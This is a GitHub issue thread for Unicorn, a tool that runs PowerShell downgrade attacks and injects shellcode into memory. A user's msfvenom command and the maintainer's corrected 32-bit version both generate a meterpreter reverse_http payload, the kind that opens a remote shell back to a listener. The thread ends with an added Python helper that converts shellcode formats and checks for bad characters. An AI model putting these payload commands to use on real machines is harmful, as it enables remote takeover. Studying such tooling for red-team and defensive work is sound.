trustedsec / unicorn

Unicorn is a simple tool for using a PowerShell downgrade attack and inject shellcode straight into memory. Based on Matthew Graeber's powershell attacks and the powershell bypass technique presented by David Kennedy (TrustedSec) and Josh Kelly at Defcon 18.
https://www.trustedsec.com

HTA generation not pulling through custom shellcode from text file #101

Closed confuciussayuhm closed 5 years ago

confuciussayuhm commented 5 years ago

Hello there,

I have generated custom shellcode with this command: msfvenom -p windows/x64/meterpreter/reverse_http LHOST=0.0.0.0 LPORT=444 DisbalePayloadHandler=True PrependMigrate=True -f c -a x64 --platform windows -b "\x00" -o ~/shellcode.txt

Using this command: python unicorn.py ~/Downloads/working/shellcode.txt shellcode hta just produces a powershell_attack.txt file.

I am expecting this command to output these three files:

/opt/unicorn/hta_attack(master*) » ls
index.html Launcher.hta unicorn.rc

trustedsec commented 5 years ago

Hey there! There are a few issues with the above command. First, you will want to generate 32-bit shellcode only, even on a 64-bit platform. That is due to how Unicorn injects shellcode directly into memory and downgrades the process by using the SYSWOW64 powershell process for memory injection.

So your first command should be:

msfvenom -p windows/meterpreter/reverse_http LHOST=0.0.0.0 LPORT=444 DisbalePayloadHandler=True PrependMigrate=True -f c -a x86 --platform windows -b "\x00" -o ~/shellcode.txt

Next, the shellcode piece within Unicorn: Unicorn wouldn't parse the direct export from it being formatted as -c traditionally, because it is looking for something like 0x00,0x01,0x02. However, there were already portions of the code where I was parsing msfvenom via the -f c type, so I added this as a function and reused the code so that it could parse it.

There appears to be a bug where it wasn't properly using the tag hta or macro; I fixed this in the latest release and it should work as intended.

Thanks for the report! New release 3.6.1 is out now.
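The maintainer's reply above describes two input shapes: the `0x00,0x01,0x02` comma-separated form Unicorn looks for, and the `-f c` export from msfvenom (a C char array of `\xNN` escapes) that the added parser handles. The following is an added example, not code from the Unicorn project or from either participant in this thread, showing a small Python normalizer that accepts either shape, converts it to the comma-separated form, and reports any bytes that the `-b "\x00"` bad-character option was supposed to exclude. The sample input is constructed filler (NOP/INT3/RET bytes and two ASCII letters), not real shellcode, and the function names are this example's own.

```python
import re

# Constructed sample in the shape of msfvenom "-f c" output. The bytes are
# filler (NOP, NOP, INT3, RET, 'A', 'B'), not a real payload.
SAMPLE_MSFVENOM_C = '''unsigned char buf[] =
"\\x90\\x90\\xcc\\xc3"
"\\x41\\x42";
'''

# One "\xNN" escape inside the C string literal.
C_ESCAPE = re.compile(r'\\x([0-9a-fA-F]{2})')
# One "0xNN" token in the comma-separated form Unicorn expects.
HEX_TOKEN = re.compile(r'0x([0-9a-fA-F]{2})')


def parse_c_format(text: str) -> bytes:
    """Extract raw bytes from msfvenom '-f c' output (C char array of \\xNN escapes)."""
    return bytes(int(h, 16) for h in C_ESCAPE.findall(text))


def parse_unicorn_format(text: str) -> bytes:
    """Extract raw bytes from the '0x00,0x01,0x02' form."""
    return bytes(int(h, 16) for h in HEX_TOKEN.findall(text))


def load_shellcode(text: str) -> bytes:
    """Accept either form: the C export contains '\\x' escapes, the other does not."""
    if '\\x' in text:
        return parse_c_format(text)
    return parse_unicorn_format(text)


def to_unicorn_format(data: bytes) -> str:
    """Render bytes as the comma-separated '0xNN' form."""
    return ",".join(f"0x{b:02x}" for b in data)


def bad_char_offsets(data: bytes, bad: bytes = b"\x00") -> list:
    """Offsets of bytes that appear in the bad-character list (e.g. the -b "\\x00" set).

    A non-empty result means the encoder did not honour the exclusion and the
    blob should not be handed to the next stage as-is.
    """
    return [i for i, b in enumerate(data) if b in bad]


if __name__ == "__main__":
    blob = load_shellcode(SAMPLE_MSFVENOM_C)
    print(f"{len(blob)} bytes: {to_unicorn_format(blob)}")
    print("bad-char offsets:", bad_char_offsets(blob))
```

Running the block prints the six constructed bytes in the comma-separated form and an empty bad-character list; feeding it a blob that contains a null would list the offending offsets, which is the check worth doing before assuming the `-b` option did its job.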